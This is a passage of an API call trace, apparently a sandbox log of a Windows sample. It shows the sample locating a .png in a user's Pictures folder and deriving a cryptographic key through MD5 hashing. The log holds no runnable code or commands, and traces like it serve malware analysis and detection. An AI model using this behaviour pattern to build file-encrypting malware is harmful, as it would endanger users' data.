0x7b1760 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af348 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce80 [0039.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af348 | out: hHeap=0x770000) returned 1 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88c988 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b15a8 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af348 [0039.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd78 | out: hHeap=0x770000) returned 1 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0039.548] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b17b0 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0039.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8898e0 | out: hHeap=0x770000) returned 1 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8898e0 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889910 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cbb0 [0039.548] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0039.548] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="g", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="ng", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="png", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0039.549] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".png", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbb0 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889910 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb20 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1a80 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.549] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af468 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4a8 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4a8 | out: hHeap=0x770000) returned 1 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af468 | out: hHeap=0x770000) returned 1 [0039.549] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1a80 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0039.549] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af468 [0039.549] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0039.550] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.550] PeekMessageW (in: lpMsg=0x6aeb54, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb54) returned 0 [0039.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.550] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\KmZe-_JDZKS16W.png", lpFindFileData=0x6ae7b8 | out: lpFindFileData=0x6ae7b8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xec96c9a0, ftCreationTime.dwHighDateTime=0x1d5c32c, ftLastAccessTime.dwLowDateTime=0x82d46af0, ftLastAccessTime.dwHighDateTime=0x1d5b647, ftLastWriteTime.dwLowDateTime=0x82d46af0, ftLastWriteTime.dwHighDateTime=0x1d5b647, nFileSizeHigh=0x0, nFileSizeLow=0x15c26, dwReserved0=0x6ae908, dwReserved1=0x777648, cFileName="KmZe-_JDZKS16W.png", cAlternateFileName="KMZE-_~1.PNG")) returned 0x7c2240 [0039.550] FindClose (in: hFindFile=0x7c2240 | out: hFindFile=0x7c2240) returned 1 [0039.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd90 | out: hHeap=0x770000) returned 1 [0039.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cda8 | out: hHeap=0x770000) returned 1 [0039.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1dc8 | out: hHeap=0x770000) returned 1 [0039.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4b8 | out: hHeap=0x770000) returned 1 [0039.550] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.550] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1670 | out: hHeap=0x770000) returned 1 [0039.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da138 | out: hHeap=0x770000) returned 1 [0039.550] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.550] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.550] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.550] PeekMessageW (in: lpMsg=0x6ae6f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae6f4) returned 0 [0039.551] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.551] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x754b0000 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.551] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.551] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.551] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.551] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2e8 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1788 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cca0 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da3b8 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1800 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cbe0 | out: hHeap=0x770000) returned 1 [0039.551] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1aa8 | out: hHeap=0x770000) returned 1 [0039.551] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.551] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.551] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.552] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.552] PeekMessageW (in: lpMsg=0x6ae4c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae4c4) returned 0 [0039.552] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.552] CryptAcquireContextA (in: phProv=0x6ae498, szContainer=0x0, szProvider=0x0, dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x6ae498*=0x7d5c40) returned 1 [0039.553] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.553] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.553] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXTSET", cchLength=0x12 | out: lpsz="__CRYPT_CONTEXTSET") returned 0x12 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.553] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.553] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd00 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1cd8 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1b8 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1ad0 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc70 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b19b8 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1698 | out: hHeap=0x770000) returned 1 [0039.553] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2140 | out: hHeap=0x770000) returned 1 [0039.553] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0039.553] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.553] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2b8 | out: hHeap=0x770000) returned 1 [0039.553] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.553] PeekMessageW (in: lpMsg=0x6ae8bc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae8bc) returned 0 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab380 | out: hHeap=0x770000) returned 1 [0039.553] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889dd8 | out: hHeap=0x770000) returned 1 [0039.553] PeekMessageW (in: lpMsg=0x6aeb14, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb14) returned 0 [0039.554] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.554] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.554] PeekMessageW (in: lpMsg=0x6aed6c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0039.554] CharUpperBuffW (in: lpsz="_CRYPT_DERIVEKEY", cchLength=0x10 | out: lpsz="_CRYPT_DERIVEKEY") returned 0x10 [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da1c8 | out: hHeap=0x770000) returned 1 [0039.554] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.554] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.554] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b18c8 | out: hHeap=0x770000) returned 1 [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.554] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.554] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da408 | out: hHeap=0x770000) returned 1 [0039.554] PeekMessageW (in: lpMsg=0x6ae1c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1c4) returned 0 [0039.554] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c21c0 | out: hHeap=0x770000) returned 1 [0039.554] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.554] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.554] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da238 | out: hHeap=0x770000) returned 1 [0039.554] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.555] PeekMessageW (in: lpMsg=0x6ae38c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae38c) returned 0 [0039.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab530 | out: hHeap=0x770000) returned 1 [0039.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cdf0 | out: hHeap=0x770000) returned 1 [0039.555] PeekMessageW (in: lpMsg=0x6ae5e4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae5e4) returned 0 [0039.555] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.555] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.555] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.555] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.555] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0039.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1940 | out: hHeap=0x770000) returned 1 [0039.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da2d8 | out: hHeap=0x770000) returned 1 [0039.555] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.555] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.555] CryptCreateHash (in: hProv=0x7d5c40, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x6ae208 | out: phHash=0x6ae208) returned 1 [0039.555] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.555] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.555] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.555] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.555] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.555] CharLowerBuffW (in: lpsz="byte[256]", cchLength=0x9 | out: lpsz="byte[256]") returned 0x9 [0039.555] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.555] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.556] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b4440 | out: hHeap=0x770000) returned 1 [0039.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7da308 | out: hHeap=0x770000) returned 1 [0039.556] PeekMessageW (in: lpMsg=0x6ae1d4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae1d4) returned 0 [0039.556] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0039.556] CryptHashData (hHash=0x7c2100, pbData=0x7c95d0, dwDataLen=0x100, dwFlags=0x1) returned 1 [0039.556] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.556] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.556] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2200 | out: hHeap=0x770000) returned 1 [0039.556] PeekMessageW (in: lpMsg=0x6ae83c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6ae83c) returned 0 [0039.556] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0039.556] HeapFree (in: hHeap=0x770000, 